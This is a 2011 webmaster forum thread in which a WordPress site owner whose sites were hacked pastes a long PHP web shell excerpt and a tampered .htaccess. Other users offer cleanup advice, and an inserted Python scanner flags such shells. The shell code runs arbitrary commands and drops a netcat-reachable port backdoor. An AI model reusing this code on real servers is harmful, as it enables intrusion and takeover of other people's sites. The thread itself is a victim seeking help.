
WATCH OUT !! HAcKeR

Discussion in 'Wordpress' started by p3y3ks, Jul 5, 2011.

  1. p3y3ks

    p3y3ks Ads.id Fan

    Joined:
    Dec 15, 2010
    Messages:
    120
    Likes Received:
    11
    Guys, today all of my websites got hacked...

    To be honest, I don't understand scripts, but when I checked the hosting root there were a lot of unusual .php files..

    And in that script, there is the website firman.gunajaya.net

    In .htaccess:
    #Begin HG DENY
    #order deny,allow
    #deny from all
    #allow from 216.110.94.228
    #allow from 125.163.142.12
    #allow from 74.202.255.243
    #allow from 180.246.40.87
    #allow from 125.163.142.127
    #allow from 182.12.0.0/16
    # END HG DENY

    In config.inc.php, and here is the script.. please explain it, guys


    <?php
    error_reporting(0);
    @set_time_limit(0);
    $sh_name = "StealHealth";
    $sh_mainurl = "http://firman.gunajaya.net";
    $html_start = '<html><head>
    <title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
    <style type="text/css">body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#111111; }table { width:100%; border-color:#111111;border-width:0pt 1pt; border-style:solid; }td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}A:Link, A:Visited { color: #999999; text-decoration: none; }A.no:Link, A.no:Visited { text-decoration: none; }A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }.fleft { float:left;text-align:left; }.fright { float:right;text-align:right; }#pagebar { font:8pt tahoma;padding:5px; }#pagebar td { vertical-align:top; }#pagebar p { font:8pt tahoma;}#pagebar a { font-weight:bold;color:red; }#pagebar a:visited { color:#00CE00; }#mainmenu { text-align:center; }#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }#maininfo,.barheader,.barheader2 { text-align:center; }#maininfo td { padding:3px; }.barheader { font-weight:bold;padding:5px; }.barheader2 { padding:5px;border:2px solid #111111; }.contents,.explorer { border-collapse:collapse;}.contents td { vertical-align:top; }.mainpanel { border-collapse:collapse;padding:5px; }.barheader,.mainpanel table,td { border:1px solid #e17b02; }.mainpanel input,select,option { border:1px solid #e17b02;margin:0; }input[type="submit"] { border:1px solid #e17b02; }input[type="text"] { padding:3px;}.fxerrmsg { color:red; font-weight:bold; }#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }#pagebar,.mainpanel,input[type="submit"] { background-color:#111111; }.barheader2,input,select,option,input[type="submit"]:hover { background-color:#111111; }textarea,.mainpanel input,select,option { 
background-color:#111111; }</style></head>';
    $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array("*"); $login_txt = "Restricted Area";
    $accessdeniedmess = "<META http-equiv=\"refresh\" content=\"2;URL=http://firman.gunajaya.net\"><body bgcolor=black><a href=\"$sh_mainurl\"><font color=lime>fx0</font></a>: <font color=red>access denied</font></body>";
    $gzipencode = TRUE; $filestealth = TRUE; $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./";$log_email = ""; $sort_default = "0a"; $sort_save = TRUE; $sess_cookie = "capriv8vars"; $usefsbuff = TRUE;$copy_unset = FALSE;$hexdump_lines = 8;$hexdump_rows = 24;
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    $disablefunc = @ini_get("disable_functions");
    if (!empty($disablefunc)) {
    $disablefunc = str_replace(" ","",$disablefunc);
    $disablefunc = explode(",",$disablefunc);
    }
    function get_phpini() {
    function U_wordwrap($str) {
    $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
    return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
    }
    function U_value($value) {
    if ($value == '') return '<i>no value</i>';
    if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
    if ($value === null) return 'NULL';
    if (@is_object($value)) $value = (array) $value;
    if (@is_array($value)) {
    @ob_start();
    print_r($value);
    $value = @ob_get_contents();
    @ob_end_clean();
    }
    return U_wordwrap((string) $value);
    }
    if (@function_exists('ini_get_all')) {
    $r = "";
    echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
    foreach (@ini_get_all() as $key=>$value) {
    $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
    }
    echo $r;
    echo "</table>";
    }
    }

    function disp_drives($curdir,$surl) {
    $letters = "";
    $v = explode("\\",$curdir);
    $v = $v[0];
    foreach (range("A","Z") as $letter) {
    $bool = $isdiskette = $letter == "A";
    if (!$bool) {$bool = is_dir($letter.":\\");}
    if ($bool) {
    $letters .= "<a href=\"".$surl."x=ls&d=".urlencode($letter.":\\")."\"".
    ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
    if ($letter.":" != $v) {$letters .= $letter;}
    else {$letters .= "<font color=red>".$letter."</font>";}
    $letters .= "]</a> ";
    }
    }
    if (!empty($letters)) {Return $letters;}
    else {Return "None";}
    }

    if (!function_exists("myshellexec")) {
    if(is_callable("popen")) {
    function myshellexec($cmd) {
    if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
    while (!feof($p)) {
    $line=fgets($p,1024);
    $out .= $line;
    }
    pclose($p);
    return $out;
    }
    } else {
    function myshellexec($cmd) {
    global $disablefunc;
    $result = "";
    if (!empty($cmd)) {
    if (is_callable("exec") and !in_array("exec",$disablefunc)) {
    exec($cmd,$result);
    $result = join("\n",$result);
    } elseif (($result = $cmd) !== FALSE) {
    } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
    $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
    } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
    $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
    } elseif (is_resource($fp = popen($cmd,"r"))) {
    $result = "";
    while(!feof($fp)) { $result .= fread($fp,1024); }
    pclose($fp);
    }
    }
    return $result;
    }
    }
    }
    function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
    if(function_exists('exec')) {
    @exec($cfe,$res);
    $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
    $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    } elseif(function_exists('passthru')) {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    } else { $res = "Ex() Disabled!"; }
    }
    return $res;
    }
    function which($pr) {
    $path = ex("which $pr");
    if(!empty($path)) { return $path; } else { return $pr; }
    }

    $hostname_x = php_uname(n);
    $itshome = getcwd();

    $Lversion = php_uname(r);
    $OSV = php_uname(s);

    if ($x == "mkdir")
    {
    if ($mkdir != $d)
    {
    if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
    elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
    echo '<br><br>';
    }
    $x = $dspact = 'ls';
    }
    function cf($fname,$text) {
    $w_file=@fopen($fname,"w") or err();
    if($w_file) {
    @fputs($w_file,@base64_decode($text));
    @fclose($w_file);
    }
    }

    function cfb($fname,$text) {
    $w_file=@fopen($fname,"w") or bberr();
    if($w_file) {
    @fputs($w_file,@base64_decode($text));
    @fclose($w_file);
    }
    }
    function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
    function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }

    if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
    $ip = gethostbyname($_SERVER["HTTP_HOST"]);
    $por = $_POST['backconnectport'];
    if (is_writable(".")) {
    cfb("shbd",$backdoor);
    ex("chmod 777 shbd");
    $cmd = "./shbd $por";
    exec("$cmd > /dev/null &");
    $scan = myshellexec("ps aux");
    } else {
    cfb("/tmp/shbd",$backdoor);
    ex("chmod 777 /tmp/shbd");
    $cmd = "./tmp/shbd $por";
    exec("$cmd > /dev/null &");
    $scan = myshellexec("ps aux");
    }
    if (eregi("./shbd $por",$scan)) {
    $data = ("\n<br>Backdoor setup successfully.");
    } else {
    $data = ("\n<br>Process not found, backdoor setup failed!");
    }
    $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
    }


    @ini_set("max_execution_time",0);
    if (!function_exists("getmicrotime")) {
    function getmicrotime() {
    list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
    }
    }
    error_reporting(5);
    @ignore_user_abort(TRUE);
    @set_magic_quotes_runtime(0);
    define("starttime",getmicrotime());
    if (get_magic_quotes_gpc()) {
    if (!function_exists("strips")) {
    function strips(&$arr,$k="") {
    if (is_array($arr)) {
    foreach($arr as $k=>$v) {
    if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
    }
    } else {$arr = stripslashes($arr);}
    }
    }
    strips($GLOBALS);
    }
    .
    .
    .
    .
    there's still more, it's long
     
  2. anisku11

    anisku11 Super Hero

    Joined:
    Jun 28, 2011
    Messages:
    1,627
    Likes Received:
    179
    Location:
    Semarang
    Wow, bro
    are the passwords the same for all the sites??
    Hmm, I don't understand coding
    I'll just wait for an expert to come by
    :hmm2:
     
  3. phims

    phims Hero

    Joined:
    Apr 4, 2010
    Messages:
    694
    Likes Received:
    36
    Location:
    Jakarta
    Hmmmm.... waiting for the expert here... wow, I need to be careful
     
  4. wikielf

    wikielf Dev Alpha 10

    Joined:
    May 20, 2011
    Messages:
    1,499
    Likes Received:
    132
    Location:
    In the world
    Maybe it has already been backdoored :peace:

    CMIIW
     
  5. ilham33

    ilham33 Trusted Web Hosting

    Joined:
    Feb 16, 2010
    Messages:
    2,785
    Likes Received:
    227
    Location:
    The North |
    Try PMing me your blog, bro.. I just want to take a look ..:)
     
  6. chikmonk

    chikmonk Super Hero

    Joined:
    Jun 10, 2009
    Messages:
    1,919
    Likes Received:
    172
    Location:
    di kolong jembatan
    collapse:collapse;padding:5px; }.barheader,.mainpanel table,td { border:1px solid #e17b02; }.mainpanel input,select,option { border:1px solid #e17b02;margin:0; }input[type="submit"] { border:1px solid #e17b02; }input[type="text"] { padding:3px;}.fxerrmsg { color:red; font-weight:bold; }#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }#pagebar,.mainpanel,input[type="submit"] { background-color:#111111; }.barheader2,input,select,option,input[type="submit"]:hover { background-color:#111111; }textarea,.mainpanel input,select,option { background-color:#111111; }</style></head>';
    $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array("*"); $login_txt = "Restricted Area";
    $accessdeniedmess = "<META http-equiv=\"refresh\" content=\"2;URL=hxxp://firman.gunajaya.net\"><body bgcolor=black><a href=\"$sh_mainurl\"><font color=lime>fx0</font></a>: <font color=red>access denied</font></body>";
    $gzipencode = TRUE; $filestealth = TRUE; $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./";$log_email = ""; $sort_default = "0a"; $sort_save = TRUE; $sess_cookie = "capriv8vars"; $usefsbuff = TRUE;$copy_unset = FALSE;$hexdump_lines = 8;$hexdump_rows = 24;
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    $disablefunc = @ini_get("disable_functions");

    Whose is the one marked in bold, guys???
    The URL looks familiar....
     
  7. jagoan

    jagoan Hero

    Joined:
    Aug 3, 2009
    Messages:
    646
    Likes Received:
    9
    Location:
    Karanganyar
    firman.gunajaya.net
     
    Last edited: Jul 6, 2011
  8. vickie modification

    vickie modification Banned

    Joined:
    Jul 4, 2011
    Messages:
    47
    Likes Received:
    0
    Hahaha, that's hilarious, bro
     
  9. p3y3ks

    p3y3ks Ads.id Fan

    Joined:
    Dec 15, 2010
    Messages:
    120
    Likes Received:
    11
    Some of them are the same, bro...

    My assumption was that it's because of W3 Total Cache.. but then why did my site that has no traffic and doesn't have W3 installed get hit too.

    Because in .htaccess there was a URL linking to paham.net, I cleaned out all the .htaccess files... and the sites were OK, but a few minutes later the display changed to a redirect to paham.net (damn this guy, doing this to his own countrymen).

    Then I checked the root, and there were strange files such as indonesia.php and config-ini.php.

    And when I opened them, the contents were more or less like what's in my thread, bro..

    The easy way is to just sort the file manager.. usually the modified date is today



    ---------- Post added at 02:09 PM ---------- Previous post was at 02:07 PM ----------

    Sure, bro... what's that lousy guy's FB, bro?
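
Added example (not part of the original thread or any poster's code): a Python triage pass over a web root that applies the check described in the post above (recently modified .php files) and also flags constructs visible in the script posted at the top of the thread. The function names, the 24-hour window, the three-primitive threshold and the sample tree built by `demo()` are assumptions made for illustration.

```python
import os, re, tempfile, time
# Heuristics drawn from the script posted in this thread; not vendor signatures.
EXEC_CALL = re.compile(rb"\b(popen|passthru|shell_exec|system|exec)\s*\(")
INDICATORS = {
    "base64-dropper": re.compile(rb"fputs\s*\([^;]*base64_decode\s*\("),
    "silenced-runtime": re.compile(rb"error_reporting\s*\(\s*0\s*\)|set_time_limit\s*\(\s*0\s*\)"),
    "disable_functions-probe": re.compile(rb"ini_get\s*\(\s*[\"']disable_functions[\"']"),
}

def scan_file(path):
    """Return the sorted names of the indicators found in one file."""
    with open(path, "rb") as fh:
        data = fh.read(2_000_000)  # cap the read; shells of this kind are small
    hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
    # One exec() call is common in plugins; three or more distinct primitives is a fallback chain.
    if len({m.group(1) for m in EXEC_CALL.finditer(data)}) >= 3:
        hits.append("exec-fallback-chain")
    return sorted(hits)

def triage(webroot, max_age_hours=24):
    """List (relative path, modified recently?, indicators) for .php files worth a look."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for fname in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(dirpath, fname)
            recent = time.time() - os.path.getmtime(path) <= max_age_hours * 3600
            hits = scan_file(path)
            if recent or hits:
                findings.append((os.path.relpath(path, webroot), recent, hits))
    return sorted(findings)

# Constructed, non-functional fragment echoing constructs from the posted script.
SAMPLE = b"""<?php error_reporting(0); @set_time_limit(0);
$disablefunc = @ini_get("disable_functions");
$p = popen($cmd, "r"); exec($cmd, $r); passthru($cmd);
@fputs($w_file, @base64_decode($text));
"""

def demo():
    """Scan a throwaway web root: an old clean file, an old shell-like file, a fresh file."""
    with tempfile.TemporaryDirectory() as root:
        old = time.time() - 10 * 86400  # backdate so only content can flag these two
        files = {"index.php": b"<?php echo 'hi';", "config-ini.php": SAMPLE}
        for name, body in files.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
            os.utime(os.path.join(root, name), (old, old))
        with open(os.path.join(root, "new-plugin.php"), "wb") as fh:
            fh.write(b"<?php // uploaded today")
        return triage(root)
```

Modification time alone is weak evidence because it can be reset by whoever wrote the file, which is why the content indicators are reported independently of the age check.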

     
  10. dNoxs

    dNoxs Ads.id Pro

    Joined:
    Dec 3, 2008
    Messages:
    441
    Likes Received:
    23
    Whoa.. someone is in trouble from being HACKED and you can still call it HILARIOUS..

    Be careful when you comment, bro.. don't just chase your post count :entahlah:
     
    xtmxady likes this.
  11. JhezeR

    JhezeR Super Hero

    Joined:
    Dec 14, 2009
    Messages:
    1,356
    Likes Received:
    59
    Location:
    Universe
    Where are you hosted, bro, and which WP version are you using?

    We each need to keep checking exploit sites and strengthen our WP security
     
  12. nodali

    nodali Ads.id Fan

    Joined:
    Jan 13, 2010
    Messages:
    230
    Likes Received:
    22
    Wow, we need to be careful about this. It's serious if this keeps happening..
     
  13. ahmadm

    ahmadm Super Hero

    Joined:
    Jul 13, 2010
    Messages:
    1,032
    Likes Received:
    36
    Location:
    Bekasi Timoer
    Doesn't this guy have anything better to do than hack his own countrymen :hahaha2:

    BTW, which WordPress version are you using, bro?
     
  14. ijoel_jazz

    ijoel_jazz Ads.id Pro

    Joined:
    Jun 16, 2011
    Messages:
    418
    Likes Received:
    41
    Location:
    Bandung
    Sorry bro,.. as a newbie I can only comment like this,..
    when it's already like that, it's better to change the FTP user and password,..
    and if possible, also replace WP with a fresh install,..
    they usually force their links into your site,...
    the reason is to get backlinks,..
    sorry if my comment isn't satisfying,..
    hope your blog is safe again
     
  15. barubelajar

    barubelajar Ads.id Fan

    Joined:
    Jul 25, 2010
    Messages:
    224
    Likes Received:
    2
    Bro, are all your websites on one hosting account?? If it's one hosting account, it's clear that if one gets hit they all get hit. Better ask your host for help, bro....
     
  16. cahpinter

    cahpinter Ads.id Starter

    Joined:
    Jun 20, 2010
    Messages:
    93
    Likes Received:
    8
  17. brother

    brother >Walyatalattaf<

    Joined:
    Sep 12, 2010
    Messages:
    801
    Likes Received:
    31
    Location:
    ★Bumi Sukowati★
    Wow, looks like the crackers have gotten frustrated with online shops, or is cracking WP just for fun?

    I was just reading about it here.

    http://wordpress.org/news/2011/06/passwords-reset/
     
  18. pikun

    pikun Hero

    Joined:
    Jul 5, 2010
    Messages:
    514
    Likes Received:
    91
    Can you zip all the files and upload them here? Or just PM the URL of the zip file. I'm curious what the backdoor's contents look like.
    IMHO, the URLs listed in the backdoor are not the intruder's URLs, but just other victims being used as intermediaries for other processes
     
  19. FaVira

    FaVira Ads.id Pro

    Joined:
    Mar 28, 2011
    Messages:
    298
    Likes Received:
    139
    Hopefully this will never happen to me or to our other friends on this forum...

    Come on, whoever can help, please help until our friend's problem is fully solved...

    HANG IN THERE, BRO ..............
     
  20. kowek

    kowek Hero

    Joined:
    Nov 25, 2009
    Messages:
    629
    Likes Received:
    15
    I have one that got defaced too. :D
    At the time I was using WP version 3.13. Then I deleted all the files on the hosting, then installed WP again, version 3.14. And it got hit again. Hehehe.
    So, I had support reset my hosting order. Now it's all sorted. :D
     
